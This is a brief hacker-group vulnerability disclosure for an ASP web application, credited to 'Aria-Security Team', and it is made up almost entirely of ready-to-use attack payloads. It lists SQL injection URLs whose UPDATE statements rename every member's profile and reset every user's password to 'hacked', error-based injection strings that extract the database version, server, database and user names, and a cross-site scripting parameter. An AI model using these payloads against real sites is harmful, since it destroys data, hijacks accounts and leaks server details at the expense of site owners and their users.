Aria-Security Team http://Aria-Security.Net ----------------------------- Discovered By: Mormoroth Shout outs The-0utlaw for completing the vuln. I.SQL Injection http://site.ltd/myaccount/viewProfile.asp?member='update Members set ProfileName='hacked';-- This Changes MemberList... http://site.ltd/myaccount/viewProfile.asp?member='update Members set Password='hacked';-- changes all the users' password to hacked myaccount/psswd.asp has the same problem a' or 1=convert(int,@@version)-- a' or 1=convert(int,@@servername)-- a' or 1=convert(int,db_name())-- a' or 1=convert(int,user_name())-- a' or 1=convert(int,system_user) Might be useful. II.Cross Site SCripting: failure.asp?err_txt="> Adivsory @ http://aria-security.net/forum/forumdisplay.php?f=60 Credits Goes To Aria-Security Team